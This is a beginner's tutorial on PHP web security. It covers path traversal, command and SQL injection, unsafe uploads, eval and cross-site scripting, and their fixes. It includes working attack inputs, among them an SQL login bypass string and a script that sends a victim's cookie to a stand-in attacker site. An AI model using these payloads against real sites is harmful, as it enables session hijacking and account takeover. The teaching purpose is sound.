PHP and other WWW scripting languages permit extensive functionality to be offered to users via the WWW interface. To prevent this functionality from being used to your or somebody else's disadvantage, it is important to avoid security holes right from the start. An important step in this direction is to avoid typical "beginners' mistakes". This article shows you a number of typical traps. You'll also learn how to recognize these (and similar) scenarios in advance and how to avoid them. We finish up with a collection of strategies that help you secure your site and keep it secure.
You have probably read or heard about it in the media: Once again someone has broken into the web server of a large company, organization or government authority. The unknown hackers (also known as "crackers") have defaced the web pages or have caused even worse damage. These are the spectacular cases. Unfortunately, break-ins into web servers are very common - in many cases, the victims never find out. Some examples:
The possibilities of causing damage are almost unlimited. However, one thing that isn't unlimited is the number of basic techniques that malicious hackers can use to gain access to your web server or database.
OK, now you've embarked on your first cautious steps into the exciting realm of PHP programming. And I'm already telling you about all the things that could potentially go wrong. Shouldn't you possibly leave PHP programming to the experts? Don't panic - what you're about to read is useful, easy to digest and possibly news to your run-of-the-mill programmer friend.
At the risk of offending some of my esteemed colleagues: The majority of security holes in web sites can probably be attributed to experienced programmers. Compared to them, you have an advantage as a beginner: You're not set in your ways yet. What do I mean by that?
Quite simply: The vast majority of programmers (even those that learned their craft in the last few years) are trained to make computer programs "run". Once upon a time, when computers still worked away in splendid isolation, one thing had priority: Given a legal input, a program had to produce useful output as quickly as possible, using as little memory as possible.
Admittedly, it would have been pretty absurd if a user of a DOS PC had deliberately fed junk data to a program in order to have it spit out or modify data that was anyway under his control. Very few people burgle their own homes. If burglars have no way of getting to your home, then there's nothing wrong with leaving a window open. In other words, under weird input your standalone computer software was allowed to do things it wasn't intended for.
With the arrival of the Internet, this is a different ball game, though. Suddenly, the entire world can send data in arbitrary combination and quantity to your machine. If this data reaches one of your programs (e.g., a PHP script), it should be certain that the program will only undertake operations with it that you are happy with. If the data does not conform to your expectations, your program should at least be able to handle it safely. This could mean, e.g., outputting an appropriate error message, writing an appropriate log entry, or simply cutting the connection to the troublemaker who has sent you all the rubbish. Let's establish our most important rule: An Internet program must not only do what it is intended for, but must also refrain from doing anything it was not intended for.
Seems obvious? Great. If you're finding the first part a little bit complicated, the second part may sound like an additional headache. However, it doesn't have to be that way: The first part gets considerably easier if you specify exactly what your program may do under which circumstances. In other words: Together with the security holes, the bugs often disappear, too.
You have a web site with a form that contains a select list. Via this list, your users can select a month, i.e., an integer number between 1 and 12. When the form is submitted, this number is passed to your script - STOP!
Why have I just shouted "STOP!"? Because it's the program flow we expect: A user completes our form and submits it to our script. So far, so good. That's the way it's meant to be. However, what about the unanticipated?
Let's have a look at the <form> tag of your form.
... |
This says that your form will be sent to a script called myScript.php when it's submitted. The script is located in the same directory on the web server as the form being shown. Now, what stops us from writing the tag as follows:
... |
That sends the data to a different script on the Internet. Now you may ask why you should want to send your carefully collected data to someone else who probably can't make any sense of it. Good question. You can answer it yourself. Let me continue with a counter-question: If we can send our data to other people's scripts, then what's there to keep other people from writing forms that let them send data to our script myScript.php?
The answer: There's no way to stop them. And that's the problem: We can no longer simply assume that the data that is passed to our script under the variable name of the select list does in fact originate from our list. If a hacker wants it to be that way, the data could be arbitrary. In other words: Apart from numbers, our script myScript.php must also be able to cope with arbitrary other strings.
Putting it on a more general footing: No matter whether your form element is a select list, a checkbox, a text input field or a radio button - the script that receives the form data only receives the (freely chosen) name of the element and the associated value. This value may always be an arbitrary string.
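To make this concrete for the month list, here is a minimal sketch of a check that accepts nothing but a month number. The helper name parse_month() and the field name "month" are assumptions for illustration, not part of the original script.

```php
<?php
// Hypothetical helper: returns the month as an int (1-12), or null if the
// submitted value is anything other than a plain month number.
function parse_month($raw): ?int
{
    // Form values arrive as strings; arrays or missing values are rejected.
    if (!is_string($raw) || !preg_match('/^\d{1,2}$/', $raw)) {
        return null;
    }
    $month = (int) $raw;
    return ($month >= 1 && $month <= 12) ? $month : null;
}

// In a real script the value would come from the form, e.g. $_POST['month']
// (an assumed field name). Here we feed it a hostile value by hand.
$month = parse_month('7; DELETE');
if ($month === null) {
    // Report the error instead of working with the value.
    $message = 'Please choose a month from the list.';
}
```

The point of returning null rather than "repairing" the input is that the calling script has to decide explicitly what to do with data it did not expect.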
To turn your script into a kind of "zombie" using specially crafted form data, the hacker must exploit functionality that is already present in your script, e.g.:
Let's have a look at a few examples to illustrate this:
Let's have a look at a little greeting card script. I'll give you a little HTML form with the following input elements:
... |
I've left out the rest of the HTML code in order to keep things readable. If you load this page into your browser, you'll get a text input field for your first name, one for the addressee's e-mail address (so he or she can be notified by e-mail) as well as a field where you can enter the actual message. You'll also see a button that lets you send off the electronic postcard. Simple, isn't it?
So far, we haven't made any mistakes - remember, we need some functionality in the script in order to wreak havoc. Let's have a look at excerpts from the associated PHP script myGreetingScript.php:
... |
Once again we've left out a lot here and will instead concentrate on the sore points. How can we get the script to do something that the owner didn't expect it to do? Now, let's plot: The site will most likely have a start page (index page). Your browser will tell you what the respective file is called, e.g., index.html. A "real" card greeting will reveal that index.html is located in the directory above the one that stores the greeting data. You only need to compare the URLs of the start page and that of the greeting card (in the e-mail). OK, now consider what happens if the user enters
../index
as the sender's first name. Did you guess right? The file that we're now opening for writing is the file with the path:
/path/to/our/site/greetings/../index.html
However, that's the same as:
/path/to/our/site/index.html
As a result, we have managed to overwrite the site's start page, using the content which we specified in the textarea. How could the site's programmer have prevented this? Very simple: He could have removed all special characters from the sender name before using it as a file name. Even better, he could have used a unique file name generated by the script rather than the user, like so:
... |
In this case, it would have been appropriate to consider what exactly might be contained in our variable $_POST["sender"] and how it might be used. As a matter of principle, it is a bad idea to use browser-supplied variables in file names or in external commands (commands that are invoked via the command line of the server or the database). Watch carefully what might go into include(), include_once(), require(), require_once(), file(), readfile(), file_get_contents(), file_put_contents(), and other commands that read or write files. In most cases, that's not necessary anyway. The next example shows how an external command can be used with malicious intent.
The second "technique" that I'd like to warn you about follows the same lines as the first, but it's potentially even more dangerous. In this example, we're not only mixing parts of file names into our input data, but are even executing commands on the server. The scenario: You have written/purchased/borrowed/stolen a little command line program called horoscope that outputs a horoscope if you hand it a date as command line parameters. Under Windows, that'd work as follows for October 7, 1965:
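The two remedies for the greeting card script (stripping special characters, or letting the script pick the file name) could be sketched roughly as follows. Both helper names are hypothetical and this is not the article's original listing; random_bytes() assumes PHP 7 or later.

```php
<?php
// Hypothetical helper: keep only letters, digits, hyphen and underscore,
// so path separators and dots can never reach a file system call.
function sanitize_name(string $name): string
{
    return preg_replace('/[^A-Za-z0-9_-]/', '', $name);
}

// Hypothetical helper: build a greeting path that ignores user input
// entirely. The directory argument is an assumption of this sketch.
function unique_greeting_path(string $dir): string
{
    // bin2hex(random_bytes(8)) yields 16 hexadecimal characters.
    return rtrim($dir, '/') . '/' . bin2hex(random_bytes(8)) . '.html';
}

// "../index" loses its dots and slash before it gets near a file name.
$safeName = sanitize_name('../index');
```

Of the two, the generated name is the more robust choice, since nothing the sender types can influence where the file ends up.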
C:\Program Files\SuperHoroscope>horoscope.exe 7 10 1965 |
You now want to make the output of this program available via the web. So you write a little form that lets the user choose day, month and year via three select lists. The lists are called "day", "month" and "year", respectively. Since you already know that these don't absolutely have to be select lists, as any hacker worth his salt can just create an arbitrary form for hacking purposes, we'll dump the form and look straight at the code of misconduct:
... |
Once again, our script works as a shining example. If you're using the intended form, you get your horoscope. However, if you use a form with the following hidden input field:
... |
then there'll be about as much left of the server's file system as there was left of the twin towers. The first unprotected variable was not only sufficient to submit all parameters for a successful execution of horoscope.exe, but also to submit a semicolon as a separator and to "inject" a subsequent DELETE command. The other variables may be left empty or may be filled with other values. In order to protect yourself against such hack attacks, you definitely don't need an army though. You could have simply ensured that your variables only contain numbers that represent a day, month, or year respectively. In the case of deviating data, you could have aborted your script with an error message. Alternatively, there's also the PHP function escapeshellarg(). It places the parameter inside quotes and defuses any quote characters it already contains, so that the shell treats the whole value as a single argument:
... |
However, in this case horoscope.exe must be able to cope with potentially inconsistent parameters, which may still represent a security risk. An input check would definitely be the best choice here.
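An input check of this kind might look like the following sketch. The function name build_horoscope_command() is hypothetical, and the sketch only builds the command string; it deliberately does not execute anything.

```php
<?php
// Hypothetical helper: returns the command line for the horoscope program,
// or null if day, month and year do not form a real calendar date.
function build_horoscope_command($day, $month, $year): ?string
{
    foreach ([$day, $month, $year] as $value) {
        // Accept only short runs of digits; anything else is rejected.
        if (!is_string($value) || !preg_match('/^\d{1,4}\z/', $value)) {
            return null;
        }
    }
    // checkdate() takes month, day, year and rejects dates like 31 February.
    if (!checkdate((int) $month, (int) $day, (int) $year)) {
        return null;
    }
    // %d formats each value as an integer, so only digits reach the command.
    return sprintf('horoscope.exe %d %d %d', $day, $month, $year);
}
```

Because the values are known to be integers by the time the command is assembled, there is nothing left for a semicolon or a second command to hide in.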
The third trick that I would like to introduce you to here is once again a variant of the two previous security holes. In this case, we're exploiting the PHP interface to our database in order to gain access to a system. Let's suppose that you store the access data for an Internet banking system in a table called accounts in your database. The table has two columns (fields) and in each row, we find the record for a particular account:
AccountNumber | AccountPassword |
145054 | 9nd3qw1y |
873221 | abcd1234 |
... | ... |
548745 | 2afje9r |
... | ... |
Many databases let you access this kind of table using a language known as SQL (perhaps you already know SQL? Great!). An SQL command that lets us, say, retrieve the record for account number 873221 and password abcd1234, looks like this:
select * from accounts where AccountNumber = 873221 and AccountPassword = "abcd1234"
Suppose you're showing your users a login page that lets them log into your system using their account number and password. Then you'll be able to compose the SQL command in your PHP script as follows:
... |
For account number 873221 and the password abcd1234 you'll get exactly the same SQL command as above, except that it's neatly tucked away in a PHP string. This is easily digested by the various query functions in PHP that hand on your command to the desired database.
You can crack such a script even without a special form. In order to get unauthorized access to the account with, say, number 548745, you may even leave the password field empty altogether. Instead, you enter the following string as the account number:
548745 or AccountNumber = 0
That makes your SQL command look like this:
select * from accounts where AccountNumber = 548745 or AccountNumber = 0 and AccountPassword = "" |
In other words: The database will return all records that match at least one of the two following conditions: the account number is 548745, or the account number is 0 and the password is empty.
The second condition is probably hard to satisfy, but the first one is trivial, at least as long as there is an account with number 548745. Either way, we're now free to use the account as we wish. Similar tricks may permit you to change account balances, fake transactions, set up accounts, etc.
By the way: We were rather benign here - some databases would have cooperated with the following input:
548745; |
That way, not only would we be able to access someone else's account, we'd also be able to let our boss (whose salary account number 643894 we've managed to get from someone in Finance over a beer) go insolvent without a trace.
The trick I've just shown you is easily thwarted by putting quotes around the value you're comparing against in your SQL command, i.e.:
... |
This would turn our malicious input into a non-existent account number. If you think that this is a little naive, you're not entirely wrong. Firstly: Can we really treat each number as if it was a string? Secondly: What keeps a hacker from entering quotes himself and thus from subverting our security measures? Good questions.
The answer to the first question is: "Not always, but often". If the submitted value must be a number (e.g., in a larger-than or smaller-than comparison), we'll have to check explicitly beforehand whether we've really been given a number.
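Such an explicit check for the login example could be sketched like this. The function name build_login_query() is hypothetical; addslashes() is used only because it is the function this article discusses, and whether backslash escaping is adequate depends on your database.

```php
<?php
// Hypothetical helper: returns the SQL string, or null if the account
// number is not made up of digits only.
function build_login_query($accountNumber, $password): ?string
{
    // ctype_digit() is true only for non-empty strings of decimal digits.
    if (!is_string($accountNumber) || !ctype_digit($accountNumber)) {
        return null;
    }
    if (!is_string($password)) {
        return null;
    }
    // The password stays inside double quotes; quotes within it are
    // backslash-escaped so they cannot end the SQL string early.
    return 'select * from accounts where AccountNumber = ' . $accountNumber
        . ' and AccountPassword = "' . addslashes($password) . '"';
}
```

With this check in place, the input "548745 or AccountNumber = 0" never reaches the database, because it is rejected before any SQL is assembled.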
The answer to the second question depends on your PHP configuration. The important bit here is a configuration setting named magic_quotes_gpc in the configuration file php.ini. It determines whether (single or double) quotes submitted by the browser should be escaped by a preceding backslash. What does this mean? Simple: Imagine that you have a form with a text input field called "dish" that takes the name of a dish. The processing script could - in the simplest case - just echo the specified dish name back to the user:
... |
If you have kept the default setting of magic_quotes_gpc in php.ini, i.e., it's On, the input
Spaghetti "Bolognese" with parmesan cheese |
won't return the original, but
Spaghetti \"Bolognese\" with parmesan cheese
instead. In many cases, though, web programmers or system administrators consider this to be a nuisance and simply turn magic_quotes_gpc off. In this case, our quotes are a fruitless security precaution. The hacker could simply enter
548745"; |
That would put us back to square one. If, however, magic_quotes_gpc is still On we're home and hosed - the hacker's quotes have been defused by the backslashes.
How do you check whether magic_quotes_gpc is set to On? If you have installed your own server, you can look it up in php.ini. If you have no control over the server configuration, you can simulate the effect of magic_quotes_gpc On, by entering the following code snippet at the beginning of your script
... |
and by using the "defused" variables $get_safe, $post_safe, and $cookie_safe instead of $_GET, $_POST and $_COOKIE.
Well, you now know the more common trickery. As you have probably noticed, all three examples have always used the same fatal combination:
Neither of these two ingredients can be entirely avoided with ease. However, you can ensure that submitted data either matches the format that you expect, or that the data is made safe before it is passed to the function involved. The next section demonstrates how this can be done.
You've already had a sneak preview of defusing browser-supplied data: Before passing values to the command line, you can quarantine them electronically with escapeshellarg(). Before insertion into SQL query strings, you can often take the bite out of dangerous quotes and apostrophes via addslashes() or magic_quotes_gpc On. Sometimes, though, defusing isn't an option. That's the case, e.g., if your command line code doesn't like quotes or if it might behave insecurely under incorrect input, or if you have to compare numerical amounts in SQL. In these cases, only an explicit check will help. Such a check may be a good idea in any case, e.g., because you want to log break-in attempts in a log file, or because you would like to give the user feedback about erroneous (but harmless) input.
In principle, you have the choice between two strategies here. The first strategy consists of defining exactly what values a certain input field may contain. If you would like to see a New Zealand postal code, for example, the input should consist of exactly four digits. In the case of an input that has to be from a clearly defined set (such as "January", "February", "March",...), e.g., from a select list or a set of radio buttons, you can check directly whether the input corresponds to one of the values in the set. If you are able to apply this strategy, then that's great - it ensures that you're really only processing values that you expected in the first place.
The downside of the first strategy is that it's sometimes a bit difficult to define exactly what is to be permitted. If you are asking for a surname, for example, "d'Artagnan" should probably pass, while "x'utwfrt" is probably not to be found in anyone's passport and would thus have to be regarded as suspect. As a result, you may have to loosen up and be prepared to accept junk data as long as it's harmless. In the case of a name, you might want to demand that it may contain apostrophes, but no double quotes, semicolons or other funny characters.
This loosening may open back doors, though: Apostrophes, for example, may serve as replacements for double quotes in SQL commands. Thus, you need to make sure that things that can contain apostrophes don't turn up unprotected in an SQL statement.
The second strategy is to search explicitly for forbidden characters. E.g., in order to subvert the SQL command in the previous example (value packaged inside ""), we need a double quote, come what may. Thus it is sufficient to check our string explicitly for the presence of such a (double quote) character. The disadvantage of this strategy is that there may be more than one "problematic" character. This is in particular the case when the string is eventually going to be part of something that's passed to the command line, where - depending on the shell - there are several characters that act as syntax rather than data. You could be chasing your tail.
So, how do we implement the two strategies? The magic word here is regular expressions.
Doesn't ring a bell? No worries - we'll explain them right now. In PHP, there are two kinds of regular expressions. The first kind (POSIX-compatible) is only intended for people who have been using them for years and don't want to let go. If you're a beginner in regular expressions, feel free to forget about them and plunge head-on into the second variety, the Perl-compatible regular expressions. All functions in PHP that deal with Perl-compatible regular expressions start with preg_ . The most important function is preg_match(). You'll hand it a pattern (the regular expression) and a variable, and it'll tell you whether the pattern matches the string.
Example: Your form variable postcode is supposed to contain a post code. In New Zealand, that's a four-digit number. In PHP, we can intercept corrupt post codes as follows:
... |
OK, if you've been to my lectures, read my book (in German), or have learned it in some other way, then you'll know the trick: The pattern /^\d{4}$/ consists of two characters known as "delimiters" (the slashes), the anchor ^ that determines that the pattern must match at the beginning of the string and the anchor $ that extends it all the way to the end of the string. Between those two anchors, we want to find digits (\d). To be precise, we want four of them and since \d\d\d\d looks a bit tacky, we use a multiplier ({4}).
If the pattern matches, preg_match() returns 1, which PHP treats as true and which we're negating to false by putting an exclamation mark in front of the function. In this case, our variable has sailed around the reef. If not, we'll let the script die with an error message. Admittedly, you could use a page with more frills for that, but this isn't the point here. So much for strategy 1.
If we don't give a hoot about the content of the form variable postcode as long as it doesn't contain any quotes, we can do it like this:
... |
In this case, we'll set off the alarm if there is a double quote anywhere (=no anchors) in our string. Since the double quote in the pattern is located between two double quotes of the PHP syntax, we have to protect it with a backslash. This time, a positive result is a reason for worry, so we don't need an exclamation mark in front of preg_match().
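The two strategies can be put side by side in a small sketch. The function names are hypothetical; the patterns are the ones discussed above. The patterns are written in single-quoted PHP strings here, so the double quote needs no backslash.

```php
<?php
// Strategy 1: accept only what is explicitly allowed (exactly four digits).
function is_valid_postcode(string $value): bool
{
    return preg_match('/^\d{4}$/', $value) === 1;
}

// Strategy 2: reject a value only if it contains a forbidden character.
function contains_double_quote(string $value): bool
{
    return preg_match('/"/', $value) === 1;
}

// A hostile value fails the first check and trips the second one.
$input = '1010" or AccountNumber = 0';
$postcodeOk = is_valid_postcode($input);        // strategy 1 verdict
$quoteFound = contains_double_quote($input);    // strategy 2 verdict
```

Comparing the return value with 1 rather than relying on truthiness also keeps a failed match (0) apart from a pattern error (false).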
Now that you know how to do the interception, all you need is a suitable regular expression for your input data, right? The following table shows a few useful expressions:
Use for | Pattern |
A string that must only contain letters | /^[^\W_\d]*$/ |
A non-empty string that must only contain letters | /^[^\W_\d]+$/ |
A string that must only contain letters and that has to start with, e.g., hello | /^hello[^\W_\d]*$/ |
A string that contains a non-personalized New Zealand car license plate | /^([A-Z]{2}\d{1,4}|[A-Z]{3}\d{1,3})$/ |
A string that contains an e-mail address | /^\w[\w\-\+\&\.]*@([A-Za-z][A-Za-z0-9\-]{0,23}\.)*[A-Za-z]{3}/ |
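If you'd like to see some of these patterns at work, here is a minimal sketch. The array keys and the helper matches() are made up for this illustration; the patterns themselves are copied from the table.

```php
<?php
// Patterns copied from the table; the array keys are hypothetical labels.
$patterns = [
    'letters'          => '/^[^\W_\d]*$/',
    'letters_nonempty' => '/^[^\W_\d]+$/',
    'hello_prefix'     => '/^hello[^\W_\d]*$/',
    'nz_plate'         => '/^([A-Z]{2}\d{1,4}|[A-Z]{3}\d{1,3})$/',
];

// Hypothetical helper: true if the pattern matches the value.
function matches(string $pattern, string $value): bool
{
    return preg_match($pattern, $value) === 1;
}

// Try each pattern against a sample value and collect the verdicts.
$sample = 'helloWorld';
$results = [];
foreach ($patterns as $label => $pattern) {
    $results[$label] = matches($pattern, $sample);
}
```

Swapping in your own sample strings is a quick way to find out where a pattern is stricter or looser than you assumed.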
Of course there are many more patterns - which you'll be able to construct yourself with a bit of practice. As always, getting your hands dirty is the best way to learn. The following little PHP script lets you carry out your own experiments:
<html> |
More information on regular expressions is available from a whole raft of sources - try this article. I learnt my basics a while ago using Learning Perl. As the Perl syntax for regular expressions is the same as in PHP, you can generally use the expressions there without much of a change. Programming PHP also has an extended chapter on regular expressions, but treats the POSIX variety first, so you may have to turn a few more pages.
This filtering method is suited in particular for data that you expect from select lists or radio buttons. This limits the number of possible values from the start. Filter as follows:
... |
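One possible way to filter against a fixed set of values is in_array() with strict comparison. This is only a sketch under that assumption; the helper name and the month list are made up for illustration.

```php
<?php
// Hypothetical helper: true only if $value is one of the allowed strings.
function is_allowed_value($value, array $allowed): bool
{
    // The third argument makes in_array() compare type and value strictly,
    // so e.g. the integer 0 never matches a string.
    return is_string($value) && in_array($value, $allowed, true);
}

// The same list that was used to build the select list in the form.
$months = ['January', 'February', 'March'];

$accepted = is_allowed_value('March', $months);
$rejected = is_allowed_value('March"; DELETE', $months);
```

Keeping the allowed values in one array that both builds the form and checks the submission means the two can't drift apart.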
Of course! So far we've only worried about how you're going to guide your user-supplied data safely through your first script. However, there are still a few back doors we need to know and shut.
If you're receiving data from your users and are storing it in a database, you'll now be aware that you need to protect yourself against SQL code injection, and you'll know how to do that. However, once the data has reached the database, the job isn't over. Sooner or later you'll have to dig the data back out again. At that point, you'll have to ask yourself which values your database fields may have assumed as a result of the user input and whether they can still cause any damage.
If you have already subjected the data to restrictive filtering, the risk may not be that high. If you've relied on magic_quotes_gpc, you'll need to be a bit careful. This is because the backslashes that protect your data will be lost as the data is written to the database. If you have kept the default setting for yet another PHP configuration setting, called magic_quotes_runtime, you'll get a string without backslash escapes when you're reading from the database. If you would then like to process your data further in one of the "risky" contexts that we have discussed, you have (once again) a problem. However - you know the solution: addslashes() or renewed filtering and/or packaging, depending on the intended use of the data.
This is a touchy topic - even the PHP developers were struggling with this one, as is evidenced by the security updates during 2002. Buffer overflows in PHP aside (we've hopefully seen the last of them), there are in principle two possible sources of danger here: the overwriting of existing files (if the user is able to influence the file name - as in our first example) and the clandestine upload of executable files to the server.
The latter is a problem if you wish to make the uploaded files available to the user, such as in photo album applications, shareware uploads, etc. (cf. the donor photo in our lecture example). In this case, you'll have to reveal to the user's browser where - and under which name - the file may be found on the server. If the uploaded file is a PHP file, the user will of course be able to pick what he or she wants to do on your server. A system(), exec(), passthru() or shell_exec() command in this file is able to do anything that a user with the privileges of the web server may do on the server machine: modify files, start or terminate programs,... Not a good idea? I think you understand.
The eval() function or an equivalent to it is found in many programming languages - including PHP. You pass it a string with PHP code, which is then executed by eval(). Here, for example, we try to call the correct function via eval():
... |
A similar risk exists when you use variable names that you can set dynamically in PHP:
... |
This can also get you into trouble, in particular if you publish your code. How's that? Consider the following script:
... |
Of course, your competitor might want to know how much rebate your valued large-volume customers are getting. Since you've made your code available to the public (without prices and password, of course), generous as you are, your competitor may simply specify "password" as the product, using a homebrew HTML form. At that point, things turn to custard for you - your script "accidentally" exposes the wholesale password as a price, completely ignoring your wish to keep it secret. That permits your competitor to have a look at your discounts next time round.
Of course, that is only one possible way to shoot yourself in the foot using variable variables. Note that, once again, insufficiently checked user input came to the party!
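One way to sidestep variable variables is to keep the prices in an array and look the product up by key. The sketch below assumes invented product names and prices; lookup_price() is a hypothetical helper, not the script discussed above.

```php
<?php
// Hypothetical price list; product names and prices are invented.
$prices = ['apple' => 0.50, 'pear' => 0.65];

// Secrets live in their own variable and are never part of the price list.
$wholesalePassword = 'not-a-price';

// Returns the price, or null for anything that is not a known product.
function lookup_price($product, array $prices): ?float
{
    if (!is_string($product) || !array_key_exists($product, $prices)) {
        return null;
    }
    return (float) $prices[$product];
}

// Asking for "wholesalePassword" finds no such key, so nothing leaks.
$leak = lookup_price('wholesalePassword', $prices);
```

The user-supplied string is now only ever used as an array key, so it can select a price but can never name an arbitrary variable in your script.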
<?php |
If you invoke this script as myScript.php?superuser=1, you don't need to know the superuser password! Why? Well, PHP regards all variables that aren't either empty or equal to 0 as true. In this case, PHP registers the GET variable supplied by the browser at the beginning of the script's execution as $superuser. This means that the second if-statement executes the superuser code!
This is strictly speaking not a PHP security problem, but it is a common one. Imagine the following situation: You use a web application on your site, say a guestbook, that lets your users leave a comment. Before the comment is published, it is saved in a database. When you log into the application, you get to vet the comment. You can then edit it, delete it, or approve it, by submitting the comment back to the application. Because it's all just going into an HTML page, your users are allowed to write what they want, and you have taken care of backslash-escaping all data before it goes into the database. So this should be safe, right? Well, not necessarily.
When the comment is written into the HTML page, it is interpreted as HTML. That is great if you want your users to be able to include bold or italic text, paragraphs, lists, or tables. However, it also lets them include forms and JavaScript, and this is where life becomes dangerous.
Assume for a moment that your comment is printed out like this:
<!-- other HTML of the page goes here ... --> <?php |
Now assume that a malicious user enters this as a comment:
I really like your page, ha, ha <form name=spyform action=www.badguy.org method=post> <input type=hidden name=cookieval> </form> <script> document.spyform.cookieval.value = document.cookie; document.spyform.submit(); </script> |
This displays as I really like your page, ha, ha, but by the time you read this, your cookie (which presumably contains your session token and hence your login credentials for this session) is on its way to the guy who really likes your page. He can then log in as you (hijack your session), and use perhaps other functionalities of your site in order to deface it or get at confidential information.
Hold on a second - how could this happen? Well, the basic problem here is that we allowed the hacker to smuggle invisible HTML and JavaScript code into our browser, which made the browser commit an action that we didn't anticipate and that revealed information about us. Note that none of the above could have been prevented by backslash-escaping quotes!
Variants of this type of attack include reading other information on the page via the document object model (DOM), or modifying actions. For example, if the user comment in the above application is displayed inside a form field for editing/vetting, we could modify the above attack in such a way that we terminate the textarea early by inserting a </textarea> tag, add an onsubmit event handler to the form, which is called when you unsuspectingly approve the lot, and replaces the nice text with a horrible insult - which you have then, seemingly, approved!
This sort of attack is easily prevented by using the htmlentities() function on every bit of user information that reaches the screen:
<!-- other HTML of the page goes here ... --> <?php |
htmlentities() converts characters into their equivalent HTML entity representation wherever possible. This causes the HTML code to be displayed rather than interpreted, and we can see immediately what our admirer is really up to.
Note that it's not sufficient to just get rid of the literal < and > and turn them into &lt; and &gt;. It's just as important to convert quotes. This is because your user data may at times be written into the values of HTML attributes, like so:
<!-- other HTML of the page goes here ... --> <input type="text" name="comment" value="<?php echo $userComment; ?>"> <!-- ... and here --> |
Even backslash-escaped quotes terminate the value string of an attribute, and an attacker can use this to add extra attributes, such as event handlers, which may be used for sinister purposes. For example, you could redirect the submission of a form to a different script, or even write a form via DOM into the page. htmlentities() takes care of HTML tags, entities, and quotes, as does htmlspecialchars(), provided that the ENT_QUOTES flag is set as the second parameter.
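Here is a minimal sketch of the attribute case, using htmlspecialchars() with ENT_QUOTES. The helper name html_escape() and the sample comment are made up for illustration; the explicit 'UTF-8' argument is an assumption about your page's encoding.

```php
<?php
// Hypothetical helper: escape a value for use in HTML text or inside a
// quoted attribute value. ENT_QUOTES converts both " and '.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// A comment that tries to close the attribute and add an event handler.
$userComment = '" onfocus="alert(1)';

// The quotes arrive in the page as &quot;, so the attribute stays intact.
$html = '<input type="text" name="comment" value="'
    . html_escape($userComment) . '">';
```

Wrapping the call in one small helper makes it harder to forget the ENT_QUOTES flag in one of the many places where user data reaches the page.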
Another sore spot that you should watch out for is the writing of user-supplied data of any kind into URLs - ensure that this cannot have other values than the ones you explicitly want to allow!
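For URLs, one possible approach is to allow only known values for the part that selects the target and to percent-encode anything else with rawurlencode(). The section names, the parameter name q and the helper section_url() are all assumptions of this sketch.

```php
<?php
// Hypothetical helper: build a link to one of a fixed set of sections.
function section_url(string $section, string $query): ?string
{
    $allowed = ['news', 'archive'];   // invented section names
    if (!in_array($section, $allowed, true)) {
        return null;                  // unknown target: build no link at all
    }
    // rawurlencode() percent-encodes everything except letters, digits
    // and the characters - _ . ~
    return '/' . $section . '.php?q=' . rawurlencode($query);
}

$good = section_url('news', 'a b&c=d');
$bad  = section_url('javascript:alert(1)', 'x');
```

If the resulting URL is then written into an HTML page, it still needs the same HTML escaping as any other user-influenced value.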
To wrap it all up, let's have a look at a collection of strategies that let you avoid security problems. Some of them may be familiar to you, others may be new to you.